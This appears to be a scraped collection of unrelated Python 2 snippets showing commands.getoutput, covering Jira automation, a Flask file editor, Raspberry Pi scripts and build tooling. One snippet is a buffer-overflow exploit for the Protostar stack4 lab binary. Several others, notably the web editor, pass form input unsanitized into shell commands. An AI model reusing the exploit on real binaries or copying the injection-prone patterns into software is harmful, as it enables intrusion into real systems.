     match = pattern.match(eabiBit)
     if match:
         self.bit = match.group(1)
     else:
         self.bit = "unknown"
         self.info += "Bit info:%s " % eabiBit
     result("arm-linux-androideabi-gcc",self.versionNo,self.bit,self.flag,self.info)
     if self.flag == "FAIL":
         global checkResult
         checkResult = 1
Example #30
def update():
	# update the ARP table and print it
	com = "ping -c 3 133.101.51.255"
	commands.getoutput(com)
	out = commands.getoutput("arp -a")
	print out
	return out.splitlines()
Example #31
def GenerateUUID():
    """Call unix uuid command to generate a universal unique id.

  Returns: string containing the output of uuidgen program.
  """
    return commands.getoutput('uuidgen')
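Shelling out to uuidgen works, but the standard uuid module provides the same thing without a subprocess; a minimal sketch (GenerateUUID_stdlib is a hypothetical name, not part of the original):

import uuid

def GenerateUUID_stdlib():
    # uuid4() returns a random UUID, comparable to uuidgen's default output.
    return str(uuid.uuid4())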
   WritePoolFile = LArCalib_Flags.WritePoolFile

if not 'WriteIOV' in dir():
   WriteIOV = LArCalib_Flags.WriteIOV

if not 'IOVBegin' in dir():
   IOVBegin = int(RunNumberList[0])
   
if not 'IOVEnd' in dir():
   IOVEnd = LArCalib_Flags.IOVEnd

if not 'DBConnectionCOOL' in dir():  
   DBConnectionCOOL = "oracle://ATLAS_COOLPROD;schema=ATLAS_COOLOFL_LAR;dbname=CONDBR2;"   

if not 'OutputPedAutoCorrRootFileDir' in dir():
   OutputPedAutoCorrRootFileDir  = commands.getoutput("pwd")
   
if not 'OutputPedAutoCorrPoolFileDir' in dir():
   OutputPedAutoCorrPoolFileDir  = commands.getoutput("pwd")

if not 'ACLArCalibFolderTag' in dir():
   rs=FolderTagResover()
   ACLArCalibFolderTag = rs.getFolderTagSuffix(LArCalib_Flags.LArPhysAutoCorrFolder)
   del rs #Close DB connection
   
   
if not 'OutputDB' in dir():
   OutputDB = LArCalib_Flags.OutputDB

if 'OutputSQLiteFile' in dir():
   OutputDB = DBConnectionFile(OutputSQLiteFile)   
Example #33
    if Leer_Estado(20) == '1': # start of the update, first steps
        print 'actualizacion pendiente'
        
        Log_Actualizador('0. Preparando actualizacion.')
        Log_Actualizador('0.1 Detener Firmware Actual.')
        res16 = Leer_Archivo(16)
        Desactivar_Trabajos(res16)        
        Log_Actualizador('0.2 Activar vista Actualizacion.')
        Activar_Trabajo('Actualizador')
        Log_Actualizador('0.3 Activar proceso Actualizacion.')
        Activar_Trabajo('Proceso_Actualizar')

        Log_Actualizador('0.4 Reiniciando el Dispostivo.')
        Borrar(20)              # clear QR
        Escrivir_Estados('2',20)   # save QR
        commands.getoutput('sudo reboot')
    if Leer_Estado(20) == '2':
        print 'Actualizando El dispostivo'
    if Leer_Estado(20) == '3':
        print 'Fin de Actualizar el dispostivo'
    if Leer_Estado(20) == '4':
        print 'Error en la actualizacion'
        
        res16 = Leer_Archivo(16)
        Activar_Trabajos(res16)
        Desactivar_Trabajo('Actualizador')
        #Log_Actualizador('0.3 Activar proceso Actualizacion.')
        Desactivar_Trabajo('Proceso_Actualizar')
        Borrar(20)              # clear QR
        Escrivir_Estados('5',20)   # save QR
        commands.getoutput('sudo reboot')
Example #34
def _get_phpmd(path, rules):
    command = "%s/php-bin/phpmd %s text %s " % (base_path, path, rules)
    errors = getoutput(command).split("\n")
    return [error for error in errors if error]
Example #35
def _get_errors(path):
    errors = getoutput("php -l  %s" % (path)).split("\n")

    return [error for error in errors if error]
 def capture_frame():
     cmd = 'date +"%Y-%m-%d_%H_%M"'
     date = commands.getoutput(cmd)
     with picamera.PiCamera() as cam:
         time.sleep(2)
         cam.capture(img_base + date + '.jpg')
    door_contact = 14
    window_contact = 15
    pir_contact = 18
    light_contact = 17

    GPIO.setmode(GPIO.BCM)
    GPIO.setup(door_contact, GPIO.IN)
    GPIO.setup(window_contact, GPIO.IN)
    GPIO.setup(pir_contact, GPIO.IN)
    GPIO.setup(light_contact, GPIO.OUT)

    prev_input_door = 1
    prev_input_window = 1
    prev_input_pir = 1
    shl_cmd = 'readlink -f $(dirname LKR0.00)'
    base_path = commands.getoutput(shl_cmd)
    img_base = base_path + '/images/'
    api_call_script = base_path + '/api_calls.sh'

    #Turn off the light at startup
    print 'Light: Off'
    #GPIO.output(light_contact,1)
    GPIO.output(light_contact, 0)

    def capture_frame():
        cmd = 'date +"%Y-%m-%d_%H_%M"'
        date = commands.getoutput(cmd)
        with picamera.PiCamera() as cam:
            time.sleep(2)
            cam.capture(img_base + date + '.jpg')
            #time.sleep(5)
Example #38
        try:
            commands.getoutput(''' ssh shipcbt "date -s '%s'" ''' % data)
            return Response(json.dumps({
                'result': True,
                "message": u'设置成功'
            }),
                            mimetype='application/json')
        except Exception, e:
            return Response(json.dumps({
                'result': True,
                "message": u'设置失败。{0}'.format(e)
            }),
                            mimetype='application/json')
    #else:
    #return redirect(index)
    current_tiem = commands.getoutput('''ssh shipcbt "date +%F\ %T" ''')
    return render_template('settime.html', current_tiem=current_tiem)


############################################################


@main.route('/clean_cache', methods=['GET', 'POST'])
@login_required
def clean_cache():
    '''
    @note cache cleanup
    '''
    # action = ''
    result = commands.getoutput(
        '''ssh  shipcbt "/bin/bash /root/switch_register.sh check" ''')
Example #39
def createfeaturetest():
    print "start to create feature in jira"
    fname = "feature.xlsx"
    bk = xlrd.open_workbook(fname)

    # get the username and password
    try:
        login = bk.sheet_by_name("login")
    except:
        print "no sheet in %s named login , can't login jira without it" % fname

    rowl = login.row_values(1)
    jira = JIRA('http://10.3.11.103:80/', basic_auth=(rowl[0], rowl[1]))
    project = rowl[2]
    print project
    # get the requirement info
    try:
        sh = bk.sheet_by_name("info")
    except:
        print "no sheet in %s named info" % fname
    # get the row count
    nrows = sh.nrows
    # get the column count
    ncols = sh.ncols
    print "nrows %d, ncols %d" % (nrows, ncols)

    for i in range(1, nrows):
        rowd = sh.row_values(i)
        print rowd[0], rowd[1], rowd[2], rowd[3], rowd[4], rowd[5], rowd[
            6], rowd[7], rowd[8], rowd[9]
        issue_dict = {
            'project': {
                "key": project
            },
            'issuetype': {
                'name': "软件需求"
            },
            'summary': str(rowd[0]),
            'description': str(rowd[1]),
            'customfield_19101': {
                'value': rowd[2],
                'child': {
                    'value': rowd[3]
                }
            },  # domain and module
            # 'customfield_17302': {'value': rowd[2]},  # domain
            # 'components': [{'name': rowd[3]}],  # module
            'customfield_19105': {
                'value': rowd[4]
            },  # feature point
            'customfield_19102': {
                'value': rowd[5]
            },  # requirement status
            'customfield_19103': {
                'value': rowd[6],
                'child': {
                    'value': rowd[7]
                }
            },  # requirement source 2
            'customfield_19104': str(rowd[8]),  # requirement number
            # 'assignee': {'name': rowd[9]},  # assignee
        }

        try:
            new_issue = jira.create_issue(fields=issue_dict)
            print new_issue
        except BaseException, e:
            print "create error in %d" % (i + 1)
            e = str(e).split(":")[-1].strip()
            cmd = "cat %s |tail -1" % (e)
            faillog = commands.getoutput(cmd)
            print faillog
Example #40
def editor():
    form = EditorForm()
    if form.validate_on_submit():
        param_do = form.do_action.data
        print param_do
        file_path = form.file_path.data
        (file_stat_code,
         file_stat) = commands.getstatusoutput("stat %s " % file_path)
        if param_do == "read":

            # check whether the file exists
            if not os.access(file_path, os.F_OK):
                #print file_stat_dis
                flash("【ERROR:】该文件 %s 不存在" % file_path, "danger")
                return render_template('editor.html',
                                       form=form,
                                       file_path=file_path,
                                       file_stat=file_stat,
                                       file_stat_dis=False)
            # check whether the file is readable
            elif not os.access(file_path, os.R_OK):
                flash("【ERROR:】该文件 %s 不可读" % file_path, "danger")
                return render_template('editor.html',
                                       form=form,
                                       file_path=file_path,
                                       file_stat=file_stat,
                                       file_stat_dis=False)
            # check whether the file is writable
            elif not os.access(file_path, os.W_OK):
                flash("【ERROR:】该文件 %s 只可读不可写" % file_path, "warning")
                with open(file_path, 'rb') as f:
                    file_data = f.read()
                    f.closed
                form.file_data.data = file_data
                return render_template('editor.html',
                                       form=form,
                                       file_path=file_path,
                                       file_stat=file_stat,
                                       file_stat_dis=True)
            # read the file
            else:
                with open(file_path, 'rb') as f:
                    file_data = f.read()
                    f.closed
                form.file_data.data = file_data
                return render_template('editor.html',
                                       form=form,
                                       file_path=file_path,
                                       file_stat=file_stat,
                                       file_stat_dis=True)
        # save the file
        if param_do == 'save':
            file_access = os.access(file_path, os.W_OK)
            if not file_access:
                flash("【ERROR:】该文件 %s 只可读不可写" % file_path, "danger")
                return render_template('editor.html',
                                       form=form,
                                       file_path=file_path,
                                       file_access=file_access,
                                       file_stat=file_stat,
                                       file_stat_dis=False)
            # compare file MD5s; if they match, the file has not changed
            file_md5sum = md5(open(file_path, 'rb').read()).hexdigest()
            form_md5sum = md5(form.file_data.data.replace('\r\n',
                                                          '\n')).hexdigest()
            if file_md5sum == form_md5sum:
                flash("【NOTICE:】该文件 %s 未发生改变" % file_path, "info")
                return render_template('editor.html',
                                       form=form,
                                       file_path=file_path,
                                       file_access=file_access,
                                       file_stat=file_stat,
                                       file_stat_dis=True)
            # back up the file
            postfix = time.strftime("%Y%m%d%H%M%S")
            file_backup = file_path + "." + postfix
            (rescode, result) = commands.getstatusoutput(
                "cp -p {0} {1}".format(file_path, file_backup))

            if rescode == 0:
                # dos2unix
                commands.getoutput("dos2unix %s" % file_path)
                flash("【SUCCESS】: 成功保存修改并备份文件为:  %s" % file_backup, "success")
            else:
                flash("【ERROR:】该文件 %s 备份失败" % file_path, "danger")
            file = open(file_path, 'wb')
            file.write(form.file_data.data.replace('\r\n', '\n'))
            file.close()

            return render_template('editor.html',
                                   form=form,
                                   file_path=file_path,
                                   file_access=file_access,
                                   file_stat=file_stat,
                                   file_stat_dis=False)
    return render_template('editor.html', form=form)
Example #41
def createbug():
    print "start to create bug in jira"
    fname = "bug.xlsx"
    bk = xlrd.open_workbook(fname)

    # get the username and password
    try:
        login = bk.sheet_by_name("login")
    except:
        print "no sheet in %s named login , can't login jira without it" % fname

    rowl = login.row_values(1)
    jira = JIRA('http://jira.zeusis.com', basic_auth=(rowl[0], rowl[1]))

    #get bug info and create
    try:
        sh = bk.sheet_by_name("info")
    except:
        print "no sheet in %s named info" % fname
    # get the row count
    nrows = sh.nrows
    # get the column count
    ncols = sh.ncols
    print "nrows %d, ncols %d" % (nrows, ncols)

    for i in range(1, nrows):
        rowd = sh.row_values(i)
        issue_dict = {
            'project': {
                "key": rowd[0]
            },
            'issuetype': {
                'name': "缺陷"
            },
            'summary': str(rowd[1]),
            'description': str(rowd[2]),
            'customfield_17302': {
                'value': rowd[3]
            },  # domain
            'components': [{
                'name': rowd[4]
            }],  # module
            'assignee': {
                'name': rowd[5]
            },
            'versions': [{
                'name': rowd[6]
            }],
            'customfield_15121': {
                'value': rowd[7]
            },
        }
        try:
            new_issue = jira.create_issue(fields=issue_dict)
            print new_issue
        except BaseException, e:
            print "create error in %d" % (i + 1)
            e = str(e).split(":")[-1].strip()
            cmd = "cat %s |tail -1" % (e)
            faillog = commands.getoutput(cmd)
            print faillog
Example #42
def createfeaturezhengshi():
    print "start to create feature in jira"
    fname = "feature.xlsx"
    bk = xlrd.open_workbook(fname)

    # get the username and password
    try:
        login = bk.sheet_by_name("login")
    except:
        print "no sheet in %s named login , can't login jira without it" % fname

    rowl = login.row_values(1)
    if isinstance(rowl[0], float) and rowl[0] == int(rowl[0]):
        rowl[0] = int(rowl[0])
    if isinstance(rowl[1], float) and rowl[1] == int(rowl[1]):
        rowl[1] = int(rowl[1])
    jira = JIRA('http://jira.ccdomain.com:80/', basic_auth=(rowl[0], rowl[1]))
    project = rowl[2]
    print project
    # get the requirement info
    try:
        sh = bk.sheet_by_name("info")
    except:
        print "no sheet in %s named info" % fname
    # get the row count
    nrows = sh.nrows
    # get the column count
    ncols = sh.ncols
    print "nrows %d, ncols %d" % (nrows, ncols)

    for i in range(1, nrows):
        rowd = sh.row_values(i)
        print rowd[0], rowd[1], rowd[2], rowd[3], rowd[4], rowd[5], rowd[
            6], rowd[7], rowd[8]
        if project == 'PSR':
            issue_dict = {
                'project': {
                    "key": project
                },
                'issuetype': {
                    'name': "软件需求"
                },
                'customfield_19105': {
                    'value': rowd[0]
                },  # requirement source
                'customfield_19106': {
                    'value': rowd[1]
                },  # requirement version number
                'customfield_19102': str(rowd[2]),  # carrier requirement number
                'customfield_17302': {
                    'value': rowd[3]
                },  # domain
                'components': [{
                    'name': rowd[4]
                }],  # module
                'customfield_19100': str(rowd[5]),  # top-level requirement
                'summary': str(rowd[6]),
                'description': str(rowd[7]),
                # 'customfield_19101': {'value': rowd[2], 'child': {'value': rowd[3]}},  # domain and module
                'customfield_19104': {
                    'value': rowd[8]
                },  # whether the requirement is valid

                # 'customfield_19101': {'value': rowd[6],'child':{'value':rowd[7]}},  # requirement source

                # 'assignee': {'name': rowd[9]},  # assignee
            }
        else:
            issue_dict = {
                'project': {
                    "key": project
                },
                'issuetype': {
                    'name': "软件需求"
                },
                'customfield_19105': {
                    'value': rowd[0]
                },  # requirement source
                'customfield_19106': {
                    'value': rowd[1]
                },  # requirement version number
                'customfield_19102': str(rowd[2]),  # carrier requirement number
                'customfield_17302': {
                    'value': rowd[3]
                },  # domain
                'components': [{
                    'name': rowd[4]
                }],  # module
                'customfield_19100': str(rowd[5]),  # top-level requirement
                'summary': str(rowd[6]),
                'description': str(rowd[7]),
                # 'customfield_19101': {'value': rowd[2], 'child': {'value': rowd[3]}},  # domain and module
                # 'customfield_19104': {'value': rowd[8]},  # whether the requirement is valid

                # 'customfield_19101': {'value': rowd[6], 'child': {'value': rowd[7]}},  # requirement source

                # 'assignee': {'name': rowd[9]},  # assignee
            }

        try:
            new_issue = jira.create_issue(fields=issue_dict)
            print new_issue
        except BaseException, e:
            print e
            print "create error in %d" % (i + 1)
            e = str(e).split(":")[-1].strip()
            cmd = "cat %s |tail -1" % (e)
            faillog = commands.getoutput(cmd)
            print faillog
Example #43
# Define the FSL-bin directory
fslDir = os.path.join(os.environ["FSLDIR"], 'bin', '')

# Create output directory if needed
if not os.path.isdir(outDir):
    os.makedirs(outDir)

# Get TR of the fMRI data, if not specified
if args.TR:
    TR = args.TR
else:
    cmd = ' '.join([
        os.path.join(fslDir, 'fslinfo'), inFile,
        '| grep pixdim4 | awk \'{print $2}\''
    ])
    TR = float(commands.getoutput(cmd))

# Check TR
if TR == 1:
    print 'Warning! Please check whether the determined TR (of ' + str(
        TR) + 's) is correct!\n'
elif TR == 0:
    print 'TR is zero. ICA-AROMA requires a valid TR and will therefore exit. Please check the header, or define the TR as an additional argument.\n----------------------------- ICA-AROMA IS CANCELED -----------------------------\n'

# Define/create mask. Either by making a copy of the specified mask, or by creating a new one.
mask = os.path.join(outDir, 'mask.nii.gz')
if args.mask:
    shutil.copyfile(args.mask, mask)
else:
    # If a Feat directory is specified, and an example_func is present use example_func to create a mask
    if args.inFeat and os.path.isfile(
Example #44
def createfeature():
    print "start to create feature in jira"
    fname = "feature.xlsx"
    bk = xlrd.open_workbook(fname)

    # get the username and password
    try:
        login = bk.sheet_by_name("login")
    except:
        print "no sheet in %s named login , can't login jira without it" % fname

    rowl = login.row_values(1)
    jira = JIRA('http://jira.zeusis.com', basic_auth=(rowl[0], rowl[1]))

    # get the requirement info
    try:
        sh = bk.sheet_by_name("info")
    except:
        print "no sheet in %s named info" % fname
    # get the row count
    nrows = sh.nrows
    # get the column count
    ncols = sh.ncols
    print "nrows %d, ncols %d" % (nrows, ncols)

    for i in range(1, nrows):
        rowd = sh.row_values(i)
        if rowd[8] == u'\u65e0':
            issue_dict = {
                'project': {
                    "id": "12400"
                },
                'issuetype': {
                    'name': "软件需求"
                },
                'summary': str(rowd[0]),
                'description': str(rowd[1]),
                'customfield_17302': {
                    'value': rowd[2]
                },  # domain
                'components': [{
                    'name': rowd[3]
                }],  # module
                'customfield_16107': [{
                    'value': rowd[4]
                }],  # product
                'customfield_16115': {
                    'name': rowd[5]
                },  # software manager
            }
        else:
            issue_dict = {
                'project': {
                    "id": "12400"
                },
                'issuetype': {
                    'name': "软件需求"
                },
                'summary': str(rowd[0]),
                'description': str(rowd[1]),
                'customfield_17302': {
                    'value': rowd[2]
                },  # domain
                'components': [{
                    'name': rowd[3]
                }],  # module
                'customfield_16107': [{
                    'value': rowd[4]
                }],  # product
                'customfield_16115': {
                    'name': rowd[5]
                },  # software manager
                'customfield_16617': {
                    'value': rowd[6]
                },
            }
        try:
            new_issue = jira.create_issue(fields=issue_dict)
            print new_issue
        except BaseException, e:
            print "create error in %d" % (i + 1)
            e = str(e).split(":")[-1].strip()
            cmd = "cat %s |tail -1" % (e)
            faillog = commands.getoutput(cmd)
            print faillog
 def isRunning(self):
     if self.iface:
         return True
     if len(commands.getoutput("audtool2 version")) > 0:
         return True
     return False
Example #46
def main():
    """
creates multiple posfiles based on a 'report_match_only' flag from a matching log file
	"""

    parser = OptionParser()
    parser.add_option("-l", dest="log", help="log")
    parser.add_option("-b", dest="base", help="base file name")
    parser.set_description(main.__doc__)
    (options, args) = parser.parse_args()

    if not options.log or not options.base:
        parser.print_help()
        sys.exit()

    pos0 = options.base + ".pos0"
    pos1 = options.base + ".pos1"
    pos2 = options.base + ".pos2"
    pos3 = options.base + ".pos3"
    pos4 = options.base + ".pos4"

    cmd0 = "grep 'match f' " + options.log + " | sort -n +2 | uniq | grep ': 1' | awk '{print $5}' | sort -n | uniq"
    cmd1 = "grep 'match f' " + options.log + " | sort -n +2 | uniq | grep ': 2' | awk '{print $5}' | sort -n | uniq"
    cmd2 = "grep 'match f' " + options.log + " | sort -n +2 | uniq | grep ': 3' | awk '{print $5}' | sort -n | uniq"
    cmd3 = "grep 'match f' " + options.log + " | sort -n +2 | uniq | grep ': 4' | awk '{print $5}' | sort -n | uniq"
    cmd4 = "grep 'match f' " + options.log + " | sort -n +2 | uniq | grep ': 5' | awk '{print $5}' | sort -n | uniq"

    ans0 = commands.getoutput(cmd0)
    ans1 = commands.getoutput(cmd1)
    ans2 = commands.getoutput(cmd2)
    ans3 = commands.getoutput(cmd3)
    ans4 = commands.getoutput(cmd4)

    c0 = ans0.split()
    if len(c0) > 0:
        FILE0 = open(pos0, 'w')
        for x in c0:
            FILE0.write(x + " ")
        FILE0.write("\n")
        FILE0.close()

    c1 = ans1.split()
    if len(c1) > 0:
        FILE1 = open(pos1, 'w')
        for x in c1:
            FILE1.write(x + " ")
        FILE1.write("\n")
        FILE1.close()

    c2 = ans2.split()
    if len(c2) > 0:
        FILE2 = open(pos2, 'w')
        for x in c2:
            FILE2.write(x + " ")
        FILE2.write("\n")
        FILE2.close()

    c3 = ans3.split()
    if len(c3) > 0:
        FILE3 = open(pos3, 'w')
        for x in c3:
            FILE3.write(x + " ")
        FILE3.write("\n")
        FILE3.close()

    c4 = ans4.split()
    if len(c4) > 0:
        FILE4 = open(pos4, 'w')
        for x in c4:
            FILE4.write(x + " ")
        FILE4.write("\n")
        FILE4.close()
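
The five command/output blocks above are identical apart from the match count and the pos-file suffix; a minimal sketch of the same pipeline as a loop (write_posfiles is a hypothetical helper; it assumes the same Python 2 commands module used above):

import commands

def write_posfiles(log, base):
    # one pass per match count ': 1' .. ': 5', writing base.pos0 .. base.pos4
    for idx in range(5):
        cmd = ("grep 'match f' " + log + " | sort -n +2 | uniq | grep ': " +
               str(idx + 1) + "' | awk '{print $5}' | sort -n | uniq")
        cols = commands.getoutput(cmd).split()
        if len(cols) > 0:
            out = open("%s.pos%d" % (base, idx), 'w')
            for x in cols:
                out.write(x + " ")
            out.write("\n")
            out.close()
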
Beispiel #47
0
def view(table="emotiw_mlp_audio",
         tag="rbm1",
         user="******",
         password="",
         database="dauphiya_db",
         host="opter.iro.umontreal.ca"):
    """
    View all the jobs in the database.
    """
    import commands
    import sqlalchemy
    import psycopg2

    # Update view
    url = "postgres://%s:%s@%s/%s/" % (user, password, host, database)
    commands.getoutput("jobman sqlview %s%s %s_view" % (url, table, table))

    # Display output
    def connect():
        return psycopg2.connect(user=user,
                                password=password,
                                database=database,
                                host=host)

    engine = sqlalchemy.create_engine('postgres://', creator=connect)
    conn = engine.connect()
    experiments = sqlalchemy.Table('%s_view' % table,
                                   sqlalchemy.MetaData(engine),
                                   autoload=True)

    columns = [
        experiments.columns.id,
        experiments.columns.jobman_status,
        experiments.columns.tag,
        experiments.columns.nhiddens,
        experiments.columns.learningrate,
        experiments.columns.momentum,
        experiments.columns.features,
        experiments.columns.exampledropout,
        experiments.columns.nlayers,
        experiments.columns.trainerror,
        experiments.columns.validerror,
    ]

    results = sqlalchemy.select(columns,
                                order_by=[
                                    experiments.columns.tag,
                                    sqlalchemy.desc(
                                        experiments.columns.validerror)
                                ]).execute()
    results = [map(lambda x: x.name, columns)] + list(results)

    def get_max_width(table, index):
        """Get the maximum width of the given column index"""
        return max([len(format_num(row[index])) for row in table])

    def format_num(num):
        """Format a number according to given places.
        Adds commas, etc. Will truncate floats into ints!"""
        try:
            if "." in num:
                return "%.7f" % float(num)
            else:
                return int(num)
        except (ValueError, TypeError):
            return str(num)

    col_paddings = []

    for i in range(len(results[0])):
        col_paddings.append(get_max_width(results, i))

    for row_num, row in enumerate(results):
        for i in range(len(row)):
            col = format_num(row[i]).ljust(col_paddings[i] + 2) + "|"
            print col,
        print

        if row_num == 0:
            for i in range(len(row)):
                print "".ljust(col_paddings[i] + 1, "-") + " +",
            print
Beispiel #48
0
#!/usr/bin/python
import cgi;
import cgitb;
import time
cgitb.enable()
import commands
import sys
import string
print "Content-type: text/html\n\n";
mytemp1 = commands.getoutput('/opt/vc/bin/vcgencmd measure_temp | cut -d "=" -f2 | cut -f1')
output = "Pi CPU Temp is: " + mytemp1
print output
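
The commands module used above exists only in Python 2; on Python 3 the closest drop-in is subprocess.getoutput. A minimal sketch of the same CGI temperature read under that assumption (the vcgencmd path is taken from the example; its output is typically of the form "temp=48.3'C", so the cut pipeline is replaced with string parsing):

#!/usr/bin/python3
import subprocess

print("Content-type: text/html\n")
raw = subprocess.getoutput('/opt/vc/bin/vcgencmd measure_temp')  # e.g. "temp=48.3'C"
temp = raw.split('=', 1)[-1]
print("Pi CPU Temp is: " + temp)
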
Beispiel #49
0
    def run(self):
        # remove /usr for bdist/bdist_rpm
        match = re.search('(build/[^/]+/dumb)/usr', self.install_dir)
        if match != None:
            self.install_dir = re.sub(match.group(0), match.group(1),
                                      self.install_dir)
        # remove /var/tmp/*-buildroot for bdist_rpm
        match = re.search('(/var/tmp/.*-buildroot)/usr', self.install_dir)
        if match != None:
            self.install_dir = re.sub(match.group(0), match.group(1),
                                      self.install_dir)
        # create tmp area
        tmpDir = 'build/tmp'
        self.mkpath(tmpDir)
        new_data_files = []

        for destDir, dataFiles in self.data_files:
            newFilesList = []
            for srcFile in dataFiles:
                # check extension
                if not srcFile.endswith(
                        '-template') and not self.is_expected_extension(
                            srcFile):
                    raise RuntimeError, "%s doesn't have the -template extension" % srcFile
                # dest filename
                destFile = re.sub('(\.exe)*\-template$', '', srcFile)
                destFile = destFile.split('/')[-1]
                destFile = '%s/%s/%s' % (tmpDir, srcFile, destFile)
                # open src
                inFile = open(srcFile)
                # read
                filedata = inFile.read()
                # close
                inFile.close()
                # replace patterns
                if not self.is_expected_extension(srcFile):
                    for item in re.findall('@@([^@]+)@@', filedata):
                        if not hasattr(
                                self, item) and not self.is_expected_extension(
                                    srcFile):
                            raise RuntimeError, 'unknown pattern %s in %s' % (
                                item, srcFile)
                        # get pattern
                        patt = getattr(self, item)
                        # remove build/*/dumb for bdist
                        patt = re.sub('build/[^/]+/dumb', '', patt)
                        # remove /var/tmp/*-buildroot for bdist_rpm
                        patt = re.sub('/var/tmp/.*-buildroot', '', patt)
                        # replace
                        filedata = filedata.replace('@@%s@@' % item, patt)
                # write to dest
                if not os.path.exists(os.path.dirname(destFile)):
                    os.makedirs(os.path.dirname(destFile))
                oFile = open(destFile, 'w')
                oFile.write(filedata)
                oFile.close()
                # chmod for exe
                if srcFile.endswith('.exe-template'):
                    commands.getoutput('chmod +x %s' % destFile)
                # append
                newFilesList.append(destFile)
            # replace dataFiles to install generated file
            new_data_files.append((destDir, newFilesList))
        # install
        self.data_files = new_data_files
        install_data_org.run(self)
    def isPlaying(self):
        if self.iface:
            # note: self.iface.Playing() returns True even if it's paused
            return self.iface.Status() == "playing"
        else:
            return commands.getoutput("audtool2 playback-status") == "playing"
Beispiel #51
0
def rdaxi(addr):
    value = commands.getoutput("./../lib/rdaxi " + str(addr))
    read_data = int(value, 16)
    value = hex(read_data & int("0xffffffff", 16))  # mask to 32 bits
    return value
Beispiel #52
0
def bulidIPA():
    # before packaging, delete the existing packBagPath directory
    commands.getoutput('rm -rf %s' % packBagPath)
    # create the Payload directory
    mkdir(PayLoadPath)
    # copy the .app into PayLoadPath
    commands.getoutput('cp -r %s %s' % (appFileFullPath, PayLoadPath))
    # create the packBagPath directory on the desktop
    commands.getoutput('mkdir -p %s' % packBagPath)
    # copy the PayLoadPath directory into packBagPath
    commands.getoutput('cp -r %s %s' % (PayLoadPath, packBagPath))
    # delete the PayLoadPath directory from the desktop
    commands.getoutput('rm -rf %s' % (PayLoadPath))
    # change into packBagPath
    os.chdir(packBagPath)
    # zip up the PayLoadPath directory inside packBagPath
    commands.getoutput('zip -r ./Payload.zip .')
    print "\n*************** packaging succeeded *********************\n"
    # rename the zip file to .ipa
    commands.getoutput('mv Payload.zip Payload.ipa')
    # delete the Payload directory
    commands.getoutput('rm -rf ./Payload')
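
The packaging above shells out for every file operation; a minimal standard-library sketch of the same Payload/zip/rename flow (build_ipa, app_path, and out_dir are hypothetical names; symlink handling and error checking are omitted):

import os
import shutil
import zipfile

def build_ipa(app_path, out_dir):
    # recreate out_dir/Payload, copy the .app bundle into it, then zip it up as Payload.ipa
    payload_dir = os.path.join(out_dir, 'Payload')
    if os.path.exists(out_dir):
        shutil.rmtree(out_dir)
    os.makedirs(payload_dir)
    shutil.copytree(app_path, os.path.join(payload_dir, os.path.basename(app_path)))
    ipa_path = os.path.join(out_dir, 'Payload.ipa')
    zf = zipfile.ZipFile(ipa_path, 'w', zipfile.ZIP_DEFLATED)
    for root, dirs, files in os.walk(payload_dir):
        for name in files:
            full = os.path.join(root, name)
            zf.write(full, os.path.relpath(full, out_dir))  # archive paths start with Payload/
    zf.close()
    shutil.rmtree(payload_dir)
    return ipa_path
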
Beispiel #53
0
    def cmd(self, cmd):
        """Run a shell command and return its output as a list of stripped lines."""
        #        return [x.strip() for x in os.popen(cmd).readlines()]
        return [x.strip() for x in commands.getoutput(cmd).split('\n')]
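
A standalone sketch of the same helper without the deprecated commands module (Python 3 only; subprocess.getoutput mirrors commands.getoutput, and cmd_lines is a hypothetical name):

import subprocess

def cmd_lines(cmd):
    # run a shell command and return its output as a list of stripped lines
    return [x.strip() for x in subprocess.getoutput(cmd).split('\n')]
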
Beispiel #54
0
}
</style>
<body>
<div class="container">
<h2></h2>
<p></p>
'''
print yyy
print '<pre>'
#f=open('i','w')
#f.write( commands.getoutput('sudo aws ec2 describe-instances | grep PublicIpAddress | grep -o -P "\d+\.\d+\.\d+\.\d+" | grep -v "^10\."'))
#print commands.getoutput('sudo aws ec2 describe-instances --region us-west-2 --output table')
#print commands.getoutput('sudo aws ec2 describe-instances | grep PublicIpAddress | grep -o -P "\d+\.\d+\.\d+\.\d+" | grep -v "^10\."')
#print commands.getoutput('aws ec2 run-instances --image-id ami-6f68cf0f --count 1 --instance-type t2.micro --key-name 2ndjune --security-group-ids launch-wizard-5 --region us-west-2')
#f.close()
kk= commands.getoutput(' sudo docker run -itd -v /var/www/html/upload:/var/www/html/upload 4cf714dd5507 ')
print kk
f=open('dockernamenode','w')
f.write(kk)
f.close()
print '</pre>'
print '<div class="container">'
print '<form method="post" action="/dockerdata1.html">'
print '<label>'
print '<input type="submit" value="Click to Start the creation of Data nodes!!">'
print '</label>'
print '</form>'
print '</div>'


Beispiel #55
0
#!/usr/bin/python
# objdump reports 080483f4, exploit works in GDB, but segfault keeps python from printing result

import commands

# Path to binary
command = '/opt/protostar/bin/stack4'

# Pattern to find EIP - 128 bytes
pattern = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae'
# EIP found at 0x63413563, or offset 76

# Create new file write buffer to file
file = open('buffer', 'w+')
buffer = 'A' * 76 + '\xf4\x83\x04\x08'
file.write(buffer)
file.close()

# String to execute the command and feed the buffer file as input
line = command + " < buffer"

# Execute the command with the current buffer
output = commands.getoutput(line)
print(output)
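
The hard-coded '\xf4\x83\x04\x08' above is the little-endian encoding of the 0x080483f4 address mentioned in the comments; a sketch of the same buffer built with struct, which avoids hand-reversing the bytes:

import struct

ret_addr = 0x080483f4                            # address noted in the comments above
buffer = 'A' * 76 + struct.pack('<I', ret_addr)  # '<I' packs a little-endian unsigned 32-bit int
out = open('buffer', 'w+')
out.write(buffer)
out.close()
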
import Adafruit_BBIO.GPIO as GPIO
import Adafruit_BBIO.PWM as PWM
import Adafruit_BBIO.ADC as ADC
from Adafruit_CharLCD import Adafruit_CharLCD
from NokiaLCD import NokiaLCD
from collections import OrderedDict
import commands
import json
import time

#import game libraries
from gamelibs import config_manager
from gamelibs import lcd_manager

#Who am I? Get my ip address
ipaddress = commands.getoutput("/sbin/ifconfig").split("\n")[1].split()[1][5:]

#configuration. Load the config and get various dictionaries and arrays back
configFileName = 'game-' + ipaddress +'.config'
config, controlids, controldefs, sortedlist = config_manager.loadConfig(configFileName)

#initialise all of the LCDs and return a list of LCD objects
myLcdManager = lcd_manager.LcdManager(sortedlist, config)

for ctrlid in controlids:
